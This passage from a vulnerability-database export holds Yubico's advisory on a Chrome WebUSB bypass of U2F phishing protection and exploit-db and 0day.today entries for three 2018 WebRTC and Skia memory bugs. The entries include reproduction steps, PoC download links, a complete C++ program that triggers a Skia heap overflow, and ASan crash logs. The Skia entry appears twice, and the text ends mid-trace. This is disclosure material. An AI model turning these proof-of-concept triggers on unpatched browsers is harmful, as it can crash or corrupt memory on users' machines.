navigate to chrome://help in your browser address bar. You must restart Chrome to complete the installation.\n\n### _Update March 6, 2018_\n\nToday, Google published an automatic fix to existing Google Chrome users that disables WebUSB to address this issue in the interim. YubiKey NEO users are now safe from this unintended issue. WebUSB being disabled blocks attempted attacks until a permanent fix is available. The automatic fix is being made available without a separate Chrome update as long as you are using the latest version of Chrome. To make sure you are using the latest version of Chrome, go to chrome://help in your browser address bar to automatically check. We continue to work with Google on addressing these issues permanently.\n\n### Background\n\nOn February 27, 2018, Yubico was informed of a conference presentation on February 16, 2018 that demonstrated a potential security issue with the new WebUSB feature in Google Chrome. WebUSB allows websites to directly access USB devices. The presentation used a YubiKey NEO to demonstrate how an attacker could use WebUSB to bypass the origin checking built into Chrome that provides phishing protection for the U2F protocol.\n\nIn the demonstration it was shown that if a victim agreed to give a phishing site access via WebUSB to the YubiKey NEO in the USB port, and the victim also was successfully tricked into touching the YubiKey NEO, the U2F phishing protection could be bypassed. The researchers argued that this could be achieved with social engineering.\n\n### Summary Of The Issue\n\nThe U2F protocol was designed to protect against phishing by requiring that the origin of authentication requests for the intended website be automatically and transparently validated by the U2F client (the browser) and sent to the authenticator (the authentication token) without the need for user involvement. In certain circumstances, WebUSB allows an attacker to bypass the browser U2F origin verification and pass information directly to the authenticator. This means the information may not be trustworthy and as a result may cause the authenticator to process authentication requests originating from a phishing site.\n\n### Mitigating Factors\n\nWe recommend that users click \u201cCancel\u201d in response to any dialog boxes appearing in Chrome requesting WebUSB access to YubiKeys. The attack cannot proceed unless the user explicitly grants access to the U2F device by clicking \u201cConnect\u201d in response to the WebUSB request. The user must approve WebUSB access on a per-site and per-device basis so it is important for users to not click \u201cConnect\u201d for any website.\n\nFigure 1 shows the approval dialog:\n\n \nFigure 1: The WebUSB Access Approval Dialog for the Chrome Browser\n\nIn addition, because WebUSB does not provide a way to bypass the test-of-user-presence in the YubiKey NEO, for the phishing attack to succeed, the user would also have to touch the key to approve the authentication request.\n\nThe researchers were careful to [note](<https://www.wired.com/story/chrome-yubikey-phishing-webusb/>) that their \u201ctechnique doesn\u2019t demonstrate a flaw in Yubico\u2019s products so much as a very unintended byproduct of Chrome\u2019s WebUSB feature\u201d.\n\n### Solution\n\nIn Chrome 65, which is currently in beta, Google plans to implement a block list for WebUSB that is expected to mitigate this issue.\n\nIt is always important to keep browsers up to date with the latest patches. To make sure you are using the latest version of Chrome, go to chrome://help in your browser address bar to automatically check.\n\n### FAQ\n\n * Why can the U2F Authenticator not validate the origin? \n * Under the U2F protocol, the browser is responsible for validating the origin of the authentication request and sending it to the authenticator because the browser is the only component that has the information to do so. The authenticator relies on the site information provided by the browser being trustworthy. The researchers demonstrated how WebUSB can send arbitrary site information directly to the authenticator, bypassing the trusted path between the browser and the authenticator.\n * Is there a way to disable WebUSB entirely? \n * On March 6, 2018, Google published an automatic fix to existing Google Chrome users that disables WebUSB to address this issue in the interim.\n * I approved WebUSB access for a site/device. How do I revoke it? \n * Open Chrome Settings\n * Scroll to the bottom and click Advanced\n * Click on Content settings\n * Click on USB devices\n * Locate the device you wish to remove, and the website you want to revoke access from, then click the three dots and select \u201cRemove\u201d\n\n", "modified": "2018-02-18T00:00:00", "published": "2018-02-18T00:00:00", "id": "YSA-2018-02", "href": "https://www.yubico.com/support/security-advisories/ysa-2018-02/", "title": "Security Advisory 2018-03-02 | Yubico", "type": "yubico", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2018-06-08T18:24:48", "bulletinFamily": "exploit", "description": "WebRTC - VP9 Missing Frame Processing Out-of-Bounds Memory Access. CVE-2018-6129. Dos exploit for Multiple platform", "modified": "2018-06-08T00:00:00", "published": "2018-06-08T00:00:00", "id": "EDB-ID:44863", "href": "https://www.exploit-db.com/exploits/44863/", "type": "exploitdb", "title": "WebRTC - VP9 Missing Frame Processing Out-of-Bounds Memory Access", "sourceData": "There is a missing check in VP9 frame processing that could lead to memory corruption.\r\n\r\nIn the file video_coding/rtp_frame_reference_finder.cc, the function RtpFrameReferenceFinder::MissingRequiredFrameVp9 contains the following code:\r\n\r\n size_t temporal_idx = info.gof->temporal_idx[gof_idx];\r\n ...\r\n for (size_t l = 0; l < temporal_idx; ++l) {\r\n ...\r\n auto missing_frame_it = missing_frames_for_layer_[l].lower_bound(ref_pid);\r\n\r\nmissing_frames_for_layer_ is a std::array of length kMaxTemporalLayers which equals 5.\r\n\r\nMeanwhile, values in the temporal_idx array are read in rtp_format_vp9.cc in the following code:\r\n\r\n RETURN_FALSE_ON_ERROR(parser->ReadBits(&t, 3));\r\n ...\r\n vp9->gof.temporal_idx[i] = t;\r\n\r\nReading three bits makes the maximum size of temporal_idx 7, which can go out of bounds of the missing_frames_for_layer_ array.\r\n\r\nThis issue causes a crash in Chrome. To reproduce the issue.\r\n\r\n1) unzip the attached webrtc-from-chat.zip on a local webserver\r\n2) fetch the webrtc source (https://webrtc.org/native-code/development/), and replace src/modules/rtp_rtcp/source/rtp_format_vp9.cc with the version attached to the code\r\n3) build webrtc, including the examples\r\n4) run the attached webrtcserver.py with python 3.6 or higher\r\n5) start the peerconnection_client sample in the webrtc examples. Connect to the recommended server, and then select test2 as the peer to connect to\r\n6) visit http://127.0.0.1/webrtc-from-chat/index.html in chrome\r\n7) Enter any username and hit \"Log in\"\r\n8) Type anything into the chat window at the bottom and hit send\r\n\r\nThe attached file 'missingframe' contains the VP9 frame that causes this crash.\r\n\r\nThough the attached PoC requires user interaction, it is not necessary to exercise this issue in a browser.\r\n\r\nThis issue affects any browser that supports VP9, and can be reached by loading a single webpage (though some browsers will prompt for permissions). It also affects native clients (such as mobile applications) that use webrtc and support VP9, though the user has to place or answer a video call for their client to be in the state where this issue is reachable.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44863.zip", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/44863/"}, {"lastseen": "2018-06-08T18:24:46", "bulletinFamily": "exploit", "description": "WebRTC - VP9 Frame Processing Out-of-Bounds Memory Access. CVE-2018-6130. Dos exploit for Multiple platform", "modified": "2018-06-08T00:00:00", "published": "2018-06-08T00:00:00", "id": "EDB-ID:44862", "href": "https://www.exploit-db.com/exploits/44862/", "type": "exploitdb", "title": "WebRTC - VP9 Frame Processing Out-of-Bounds Memory Access", "sourceData": "There is a missing check in VP9 frame processing that could lead to memory corruption.\r\n\r\nIn the file video_coding/rtp_frame_reference_finder.cc, the function RtpFrameReferenceFinder::ManageFrameVp9 fetches the GofInfo based on a pic_idx parsed from the incoming packet header. If the incoming frame is of type kVideoFrameKey, find is called on an iterator and the result is used without checking whether the it succeeds.\r\n\r\n if (frame->frame_type() == kVideoFrameKey) {\r\n ...\r\n GofInfo info = gof_info_.find(codec_header.tl0_pic_idx)->second;\r\n FrameReceivedVp9(frame->id.picture_id, &info);\r\n UnwrapPictureIds(frame);\r\n return kHandOff;\r\n }\r\n\r\nThis can cause a pointer to memory outside the gof_info_ map to be passed to FrameReceivedVp9. This function both reads and writes the info structure.\r\n\r\nThis issue does not crash reliably, so I recommend reproducing it using an asan build of Chrome. To reproduce the issue:\r\n\r\n1) unzip the attached webrtc-from-chat.zip on a local webserver\r\n2) fetch the webrtc source (https://webrtc.org/native-code/development/), and replace src/modules/rtp_rtcp/source/rtp_format_vp9.cc with the version attached to the code\r\n3) build webrtc, including the examples\r\n4) run the attached webrtcserver.py with python 3.6 or higher\r\n5) start the peerconnection_client sample in the webrtc examples. Connect to the recommended server, and then select test2 as the peer to connect to\r\n6) visit http://127.0.0.1/webrtc-from-chat/index.html in chrome\r\n7) Enter any username and hit \"Log in\"\r\n8) Type anything into the chat window at the bottom and hit send\r\n\r\nChrome should crash in a few seconds.\r\n\r\nThough the attached PoC requires user interaction, it is not necessary to exercise this issue in a browser.\r\n\r\nThis issue affects any browser that supports VP9, and can be reached by loading a single webpage (though some browsers will prompt for permissions). It also affects native clients (such as mobile applications) that use webrtc and support VP9, though the user has to place or answer a video call for their client to be in the state where this issue is reachable.\r\n\r\nI recommend fixing this by changing the above code to:\r\n\r\n auto gof_info_it = gof_info_.find(codec_header.tl0_pic_idx);\r\n if (gof_info_it == gof_info_.end())\r\n return kDrop;\r\n GofInfo info = gof_info_it->second;\r\n FrameReceivedVp9(frame->id.picture_id, &info);\r\n\r\nI have verified that this fix would prevent the crash.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44862.zip", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/44862/"}, {"lastseen": "2018-07-30T13:21:15", "bulletinFamily": "exploit", "description": "Skia - Heap Overflow in SkScan::FillPath due to Precision Error. CVE-2018-6126. Dos exploit for Multiple platform. Tags: Heap Overflow", "modified": "2018-07-27T00:00:00", "published": "2018-07-27T00:00:00", "id": "EDB-ID:45098", "href": "https://www.exploit-db.com/exploits/45098/", "type": "exploitdb", "title": "Skia - Heap Overflow in SkScan::FillPath due to Precision Error", "sourceData": "There is a heap overflow in Skia when drawing paths with antialiasing turned off. This issue can be triggered in both Google Chrom and Mozilla Firefox by rendering a specially crafted SVG image. PoCs for both browsers are attached.\r\n\r\n\r\nDetails:\r\n\r\nWhen Skia fills a path with antialiasing turned off, SkScan::FillPath gets called\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkScan_Path.cpp?rcl=3708f024b1118a73f0e6b3080234311c6647663b&l=609\r\n\r\nSkScan::FillPath first checks that the path fits in the current drawing area (Clip). This happens in\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkScan_Path.cpp?rcl=3708f024b1118a73f0e6b3080234311c6647663b&l=645\r\n\r\nIf the clipping test passes at this point, then no other clipping checks will be performed when drawing this path. However, due to precision errors, it is possible that the drawing algorith is going to end up drawing outside of the current drawing area, which results in a heap overflow.\r\n\r\nIn this case, the precision errors happens when drawing cubic splines. In SkCubicEdge::setCubicWithoutUpdate, various factors needed to draw the spline are calculated. For example, on this line\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkEdge.cpp?rcl=5eb8fc585e9b3c9ccc82b0921986e1020ddaff23&l=430\r\nwhen calculating fCDx, some precision will be lost because C and D end up being shifted to the right. Because of that, it is possible that the fCDx value is going to end up smaller than it should be.\r\n\r\nThe (too small) value of fCDx then gets added to the X coordinate here\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkEdge.cpp?rcl=5eb8fc585e9b3c9ccc82b0921986e1020ddaff23&l=471\r\n\r\nit then gets propagated here\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkEdge.cpp?rcl=5eb8fc585e9b3c9ccc82b0921986e1020ddaff23&l=492\r\n\r\nand here\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkEdge.cpp?g=0&rcl=5eb8fc585e9b3c9ccc82b0921986e1020ddaff23&l=116\r\n\r\nwhere fX ends up being -2**15 (this corresponds to -0.5 in SkFixed type) and fDX ends up negative. When a spline (now approximated as a line segment) gets drawn in walk_convex_edges or walk_edges, fDX gets added to fX\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkScan_Path.cpp?rcl=3708f024b1118a73f0e6b3080234311c6647663b&l=267\r\nthen the resulting value gets rounded\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkScan_Path.cpp?rcl=3708f024b1118a73f0e6b3080234311c6647663b&l=249\r\nand becomes -1, which leads to an out-of-bounds write.\r\n\r\nExample Skia program that demonstrates the issue:\r\nNote: it should be built with ASan enabled.\r\n=================================================\r\n\r\n#include \"SkCanvas.h\"\r\n#include \"SkPath.h\"\r\n#include \"SkBitmap.h\"\r\n#include \"SkGradientShader.h\"\r\n\r\nint main (int argc, char * const argv[]) {\r\n\r\n int width = 100;\r\n int height = 100;\r\n\r\n SkBitmap bitmap;\r\n bitmap.allocN32Pixels(width, height);\r\n SkCanvas bitmapcanvas(bitmap);\r\n SkCanvas *canvas = &bitmapcanvas;\r\n\r\n SkPaint p;\r\n\r\n p.setAntiAlias(false);\r\n\r\n p.setStyle(SkPaint::kFill_Style);\r\n\r\n SkColor colors[2] = {SkColorSetARGB(10,0,0,0), SkColorSetARGB(10,255,255,255)};\r\n SkPoint points[2] = {\r\n SkPoint::Make(0.0f, 0.0f),\r\n SkPoint::Make(256.0f, 256.0f)\r\n };\r\n p.setShader(SkGradientShader::MakeLinear(\r\n points, colors, nullptr, 2,\r\n SkShader::kClamp_TileMode, 0, nullptr));\r\n\r\n SkPath path;\r\n path.moveTo(-30/64.0, -31/64.0);\r\n path.cubicTo(-31/64.0, -31/64,-31/64.0, -31/64,-31/64.0, 100);\r\n path.lineTo(100,100);\r\n path.lineTo(100,-31/64.0);\r\n\r\n canvas->drawPath(path, p);\r\n\r\n return 0; \r\n}\r\n\r\n=================================================\r\n\r\nRunning this results in the following UBSan error:\r\n../../include/core/SkPixmap.h:386:83: runtime error: left shift of negative value -1\r\nSUMMARY: AddressSanitizer: undefined-behavior ../../include/core/SkPixmap.h:386:83 in \r\n\r\nIf the program is compiled without undefined-behavior checks, then running it generates the following ASan report\r\n\r\n=================================================================\r\n==18863==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6140000021d0 at pc 0x0000018df91a bp 0x7ffcdc7708d0 sp 0x7ffcdc7708c8\r\nWRITE of size 4 at 0x6140000021d0 thread T0\r\n #0 0x18df919 in (anonymous namespace)::DstTraits<unsigned int, ((anonymous namespace)::ApplyPremul)0>::store((anonymous namespace)::SkNx<4, float> const&, unsigned int*, (anonymous namespace)::SkNx<4, float> const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/shaders/gradients/Sk4fGradientPriv.h:73:18\r\n #1 0x18df919 in void (anonymous namespace)::ramp<unsigned int, ((anonymous namespace)::ApplyPremul)0>((anonymous namespace)::SkNx<4, float> const&, (anonymous namespace)::SkNx<4, float> const&, unsigned int*, int, (anonymous namespace)::SkNx<4, float> const&, (anonymous namespace)::SkNx<4, float> const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/shaders/gradients/Sk4fLinearGradient.cpp:45\r\n #2 0x18d3eb1 in void SkLinearGradient::LinearGradient4fContext::shadeSpanInternal<unsigned int, ((anonymous namespace)::ApplyPremul)0, (SkShader::TileMode)0>(int, int, unsigned int*, int, float, float) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/shaders/gradients/Sk4fLinearGradient.cpp:256:13\r\n #3 0x18d3eb1 in void SkLinearGradient::LinearGradient4fContext::shadePremulSpan<unsigned int, ((anonymous namespace)::ApplyPremul)0>(int, int, unsigned int*, int, float, float) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/shaders/gradients/Sk4fLinearGradient.cpp:209\r\n #4 0x18d3eb1 in SkLinearGradient::LinearGradient4fContext::shadeSpan(int, int, unsigned int*, int) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/shaders/gradients/Sk4fLinearGradient.cpp:181\r\n #5 0x167213d in SkARGB32_Shader_Blitter::blitH(int, int, int) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkBlitter_ARGB32.cpp:377:25\r\n #6 0xd1cf47 in walk_convex_edges(SkEdge*, SkPath::FillType, SkBlitter*, int, int, void (*)(SkBlitter*, int, bool)) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkScan_Path.cpp:261:30\r\n #7 0xd1b364 in sk_fill_path(SkPath const&, SkIRect const&, SkBlitter*, int, int, int, bool) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkScan_Path.cpp:471:9\r\n #8 0xd1e625 in SkScan::FillPath(SkPath const&, SkRegion const&, SkBlitter*) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkScan_Path.cpp:656:9\r\n #9 0xd0c39a in SkScan::FillPath(SkPath const&, SkRasterClip const&, SkBlitter*) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkScan_AntiPath.cpp:827:9\r\n #10 0xb9ae3d in SkDraw::drawDevPath(SkPath const&, SkPaint const&, bool, SkBlitter*, bool, SkInitOnceData*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.cpp:1024:9\r\n #11 0xb9c046 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*, SkInitOnceData*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.cpp:1141:11\r\n #12 0x164e60a in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.h:58:15\r\n #13 0x164e60a in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkBitmapDevice.cpp:411\r\n #14 0xb44c54 in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:2145:23\r\n #15 0xb3bf59 in SkCanvas::drawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:1708:11\r\n #16 0x86021e in main /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../example/SkiaSDLExample.cpp:37:11\r\n #17 0x7fd0eb3672b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)\r\n #18 0x770659 in _start (/usr/local/google/home/ifratric/p0/skia/skia/out/asan/SkiaSDLExample+0x770659)\r\n\r\n0x6140000021d0 is located 0 bytes to the right of 400-byte region [0x614000002040,0x6140000021d0)\r\nallocated by thread T0 here:\r\n #0 0x825b20 in __interceptor_malloc (/usr/local/google/home/ifratric/p0/skia/skia/out/asan/SkiaSDLExample+0x825b20)\r\n #1 0xdf1d74 in sk_malloc_flags(unsigned long, unsigned int) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/ports/SkMemory_malloc.cpp:69:13\r\n #2 0x1671202 in sk_malloc_throw(unsigned long) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../include/private/SkMalloc.h:59:12\r\n #3 0x1671202 in SkARGB32_Shader_Blitter::SkARGB32_Shader_Blitter(SkPixmap const&, SkPaint const&, SkShaderBase::Context*) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkBlitter_ARGB32.cpp:336\r\n #4 0x16643f9 in SkARGB32_Shader_Blitter* SkArenaAlloc::make<SkARGB32_Shader_Blitter, SkPixmap const&, SkPaint const&, SkShaderBase::Context*&>(SkPixmap const&, SkPaint const&, SkShaderBase::Context*&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkArenaAlloc.h:103:30\r\n #5 0x1663681 in SkBlitter::Choose(SkPixmap const&, SkMatrix const&, SkPaint const&, SkArenaAlloc*, bool) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkBlitter.cpp:1119:34\r\n #6 0xb9b4fe in SkAutoBlitterChoose::choose(SkDraw const&, SkMatrix const*, SkPaint const&, bool) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkAutoBlitterChoose.h:36:20\r\n #7 0xb9aa59 in SkDraw::drawDevPath(SkPath const&, SkPaint const&, bool, SkBlitter*, bool, SkInitOnceData*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.cpp:966:34\r\n #8 0xb9c046 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*, SkInitOnceData*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.cpp:1141:11\r\n #9 0x164e60a in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.h:58:15\r\n #10 0x164e60a in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkBitmapDevice.cpp:411\r\n #11 0xb44c54 in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:2145:23\r\n #12 0xb3bf59 in SkCanvas::drawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:1708:11\r\n #13 0x86021e in main /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../example/SkiaSDLExample.cpp:37:11\r\n #14 0x7fd0eb3672b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)\r\n\r\nSUMMARY: AddressSanitizer: heap-buffer-overflow /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/shaders/gradients/Sk4fGradientPriv.h:73:18 in (anonymous namespace)::DstTraits<unsigned int, ((anonymous namespace)::ApplyPremul)0>::store((anonymous namespace)::SkNx<4, float> const&, unsigned int*, (anonymous namespace)::SkNx<4, float> const&)\r\nShadow bytes around the buggy address:\r\n 0x0c287fff83e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c287fff83f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c287fff8400: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00\r\n 0x0c287fff8410: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c287fff8420: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n=>0x0c287fff8430: 00 00 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa\r\n 0x0c287fff8440: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00\r\n 0x0c287fff8450: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c287fff8460: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c287fff8470: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c287fff8480: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==18863==ABORTING\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45098.zip", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/45098/"}], "zdt": [{"lastseen": "2018-07-30T14:28:25", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2018-07-27T00:00:00", "published": "2018-07-27T00:00:00", "id": "1337DAY-ID-30792", "href": "https://0day.today/exploit/description/30792", "title": "Skia - Heap Overflow in SkScan::FillPath due to Precision Error Vulnerability", "type": "zdt", "sourceData": "There is a heap overflow in Skia when drawing paths with antialiasing turned off. This issue can be triggered in both Google Chrom and Mozilla Firefox by rendering a specially crafted SVG image. PoCs for both browsers are attached.\r\n \r\n \r\nDetails:\r\n \r\nWhen Skia fills a path with antialiasing turned off, SkScan::FillPath gets called\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkScan_Path.cpp?rcl=3708f024b1118a73f0e6b3080234311c6647663b&l=609\r\n \r\nSkScan::FillPath first checks that the path fits in the current drawing area (Clip). This happens in\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkScan_Path.cpp?rcl=3708f024b1118a73f0e6b3080234311c6647663b&l=645\r\n \r\nIf the clipping test passes at this point, then no other clipping checks will be performed when drawing this path. However, due to precision errors, it is possible that the drawing algorith is going to end up drawing outside of the current drawing area, which results in a heap overflow.\r\n \r\nIn this case, the precision errors happens when drawing cubic splines. In SkCubicEdge::setCubicWithoutUpdate, various factors needed to draw the spline are calculated. For example, on this line\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkEdge.cpp?rcl=5eb8fc585e9b3c9ccc82b0921986e1020ddaff23&l=430\r\nwhen calculating fCDx, some precision will be lost because C and D end up being shifted to the right. Because of that, it is possible that the fCDx value is going to end up smaller than it should be.\r\n \r\nThe (too small) value of fCDx then gets added to the X coordinate here\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkEdge.cpp?rcl=5eb8fc585e9b3c9ccc82b0921986e1020ddaff23&l=471\r\n \r\nit then gets propagated here\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkEdge.cpp?rcl=5eb8fc585e9b3c9ccc82b0921986e1020ddaff23&l=492\r\n \r\nand here\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkEdge.cpp?g=0&rcl=5eb8fc585e9b3c9ccc82b0921986e1020ddaff23&l=116\r\n \r\nwhere fX ends up being -2**15 (this corresponds to -0.5 in SkFixed type) and fDX ends up negative. When a spline (now approximated as a line segment) gets drawn in walk_convex_edges or walk_edges, fDX gets added to fX\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkScan_Path.cpp?rcl=3708f024b1118a73f0e6b3080234311c6647663b&l=267\r\nthen the resulting value gets rounded\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkScan_Path.cpp?rcl=3708f024b1118a73f0e6b3080234311c6647663b&l=249\r\nand becomes -1, which leads to an out-of-bounds write.\r\n \r\nExample Skia program that demonstrates the issue:\r\nNote: it should be built with ASan enabled.\r\n=================================================\r\n \r\n#include \"SkCanvas.h\"\r\n#include \"SkPath.h\"\r\n#include \"SkBitmap.h\"\r\n#include \"SkGradientShader.h\"\r\n \r\nint main (int argc, char * const argv[]) {\r\n \r\n int width = 100;\r\n int height = 100;\r\n \r\n SkBitmap bitmap;\r\n bitmap.allocN32Pixels(width, height);\r\n SkCanvas bitmapcanvas(bitmap);\r\n SkCanvas *canvas = &bitmapcanvas;\r\n \r\n SkPaint p;\r\n \r\n p.setAntiAlias(false);\r\n \r\n p.setStyle(SkPaint::kFill_Style);\r\n \r\n SkColor colors[2] = {SkColorSetARGB(10,0,0,0), SkColorSetARGB(10,255,255,255)};\r\n SkPoint points[2] = {\r\n SkPoint::Make(0.0f, 0.0f),\r\n SkPoint::Make(256.0f, 256.0f)\r\n };\r\n p.setShader(SkGradientShader::MakeLinear(\r\n points, colors, nullptr, 2,\r\n SkShader::kClamp_TileMode, 0, nullptr));\r\n \r\n SkPath path;\r\n path.moveTo(-30/64.0, -31/64.0);\r\n path.cubicTo(-31/64.0, -31/64,-31/64.0, -31/64,-31/64.0, 100);\r\n path.lineTo(100,100);\r\n path.lineTo(100,-31/64.0);\r\n \r\n canvas->drawPath(path, p);\r\n \r\n return 0; \r\n}\r\n \r\n=================================================\r\n \r\nRunning this results in the following UBSan error:\r\n../../include/core/SkPixmap.h:386:83: runtime error: left shift of negative value -1\r\nSUMMARY: AddressSanitizer: undefined-behavior ../../include/core/SkPixmap.h:386:83 in \r\n \r\nIf the program is compiled without undefined-behavior checks, then running it generates the following ASan report\r\n \r\n=================================================================\r\n==18863==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6140000021d0 at pc 0x0000018df91a bp 0x7ffcdc7708d0 sp 0x7ffcdc7708c8\r\nWRITE of size 4 at 0x6140000021d0 thread T0\r\n #0 0x18df919 in (anonymous namespace)::DstTraits<unsigned int, ((anonymous namespace)::ApplyPremul)0>::store((anonymous namespace)::SkNx<4, float> const&, unsigned int*, (anonymous namespace)::SkNx<4, float> const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/shaders/gradients/Sk4fGradientPriv.h:73:18\r\n #1 0x18df919 in void (anonymous namespace)::ramp<unsigned int, ((anonymous namespace)::ApplyPremul)0>((anonymous namespace)::SkNx<4, float> const&, (anonymous namespace)::SkNx<4, float> const&, unsigned int*, int, (anonymous namespace)::SkNx<4, float> const&, (anonymous namespace)::SkNx<4, float> const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/shaders/gradients/Sk4fLinearGradient.cpp:45\r\n #2 0x18d3eb1 in void SkLinearGradient::LinearGradient4fContext::shadeSpanInternal<unsigned int, ((anonymous namespace)::ApplyPremul)0, (SkShader::TileMode)0>(int, int, unsigned int*, int, float, float) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/shaders/gradients/Sk4fLinearGradient.cpp:256:13\r\n #3 0x18d3eb1 in void SkLinearGradient::LinearGradient4fContext::shadePremulSpan<unsigned int, ((anonymous namespace)::ApplyPremul)0>(int, int, unsigned int*, int, float, float) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/shaders/gradients/Sk4fLinearGradient.cpp:209\r\n #4 0x18d3eb1 in SkLinearGradient::LinearGradient4fContext::shadeSpan(int, int, unsigned int*, int) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/shaders/gradients/Sk4fLinearGradient.cpp:181\r\n #5 0x167213d in SkARGB32_Shader_Blitter::blitH(int, int, int) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkBlitter_ARGB32.cpp:377:25\r\n #6 0xd1cf47 in 